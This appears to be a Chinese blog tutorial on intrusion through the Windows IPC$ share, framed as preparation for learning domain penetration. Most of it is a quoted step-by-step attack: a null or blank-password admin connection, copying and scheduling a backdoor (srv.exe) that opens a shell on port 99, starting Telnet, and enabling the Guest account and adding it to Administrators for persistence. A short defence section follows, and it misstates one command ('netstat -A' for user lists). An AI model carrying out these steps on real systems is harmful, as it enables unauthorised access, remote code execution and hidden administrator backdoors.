1. 程式人生 > >域滲透學習預備知識-IPC$的入侵防禦

域滲透學習預備知識-IPC$的入侵防禦

教程 自己 經典 ## .exe 帳號 username 所有 字典

一、什麽是IPC$

以下段落引文自:http://www.xfocus.net/articles/200303/493.html  

IPC$(Internet Process Connection)是共享"命名管道"的資源(大家都是這麽說的),它是為了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的權限,在遠程管理計算機和查看計算機的共享資源時使用。利用IPC$,連接者甚至可以與目標主機建立一個空的連接而無需用戶名與密碼(當然,對方機器必須開了ipc$共享,否則你是連接不上的),而利用這個空的連接,連接者還可以得到目標主機上的用戶列表(不過負責的管理員會禁止導出用戶列表的)。我們總在說ipc$漏洞ipc$漏洞,其實,ipc$並不是真正意義上的漏洞,它是為了方便管理員的遠程管理而開放的遠程網絡登陸功能,而且還打開了默認共享,即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$)。

所有的這些,初衷都是為了方便管理員的管理,但好的初衷並不一定有好的收效,一些別有用心者(到底是什麽用心?我也不知道,代詞一個)會利用IPC$,訪問共享資源,導出用戶列表,並使用一些字典工具,進行密碼探測,寄希望於獲得更高的權限,從而達到不可告人的目的。

二、IPC$入侵防禦基礎:

0、操作環境:

powershell 管理員

1、如何建立IPC$空連接:

1 net use \\127.0.0.1\ipc$"" /user:""

2、建立完整的用戶名稱密碼的連接:

1 net use \\127.0.0.1\ipc$"password" /user:"username"

3、映射路徑:

1 net use z: \\IP\c$ "
密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤,其他盤類推)

4、直接訪問和刪除路徑:

1 net use z: \\IP\c$ #直接訪問
2 net use c: /del 刪除映射的c盤,其他盤類推 
3 net use * /del 刪除全部,會有提示要求按y確認

5、刪除連接:

1 net use \\IP\ipc$ /del

6、引用上文地址博客的一段經典例子:

 1 ###經典入侵模式###
 2 這個入侵模式太經典了,大部分ipc教程都有介紹,我也就拿過來引用了,在此感謝原創作者!(不知道是哪位前輩) 
 3 
 4 1. C:\>net use \\127.0
.0.1\IPC$ "" /user:"admintitrators" 5 這是用《流光》掃到的用戶名是administrators,密碼為""的IP地址(空口令?哇,運氣好到家了),如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連接,因為密碼為"",所以第一個引號處就不用輸入,後面一個雙引號裏的是用戶名,輸入administrators,命令即可成功完成。 6    7 2. C:\>copy srv.exe \\127.0.0.1\admin$ 8 先復制srv.exe上去,在流光的Tools目錄下就有(這裏的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什麽地方去了)。 9    10 3. C:\>net time \\127.0.0.1 11 查查時間,發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。 12    13 4. C:\>at \\127.0.0.1 11:05 srv.exe 14 用at命令啟動srv.exe吧(這裏設置的時間要比主機時間快,不然你怎麽啟動啊,呵呵!) 15    16 5. C:\>net time \\127.0.0.1 17 再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就準備開始下面的命令。 18    19 6. C:\>telnet 127.0.0.1 99 20 這裏會用到Telnet命令吧,註意端口是99。Telnet默認的是23端口,但是我們使用的是SRV在對方計算機中為我們建立一個99端口的Shell。 21 雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了 22    23 7.C:\>copy ntlm.exe \\127.0.0.1\admin$ 24 用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。 25    26 8. C:\WINNT\system32>ntlm 27 輸入ntlm啟動(這裏的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啟動正常。然後使用"net start telnet"來開啟Telnet服務! 28 29 9. Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!(然後你想做什麽?想做什麽就做什麽吧,哈哈) 30 31 為了以防萬一,我們再把guest激活加到管理組 32 10. C:\>net user guest /active:yes 33 將對方的Guest用戶激活 34 35 11. C:\>net user guest 1234 36 將Guest的密碼改為1234,或者你要設定的密碼 37 38 12. C:\>net localgroup administrators guest /add 39 將Guest變為Administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這臺計算機)

7、防禦命令:

1 net share #查看自己的共享
2 net view \\IP #查看target的共享
3 netstat -A IP 獲取target的user列表

8、netstat的延伸使用方法:

netstat -ano | findstr "port" #查看端口號對應的PID
tasklist | findstr "PID" #查看進程號對應的程序

域滲透學習預備知識-IPC$的入侵防禦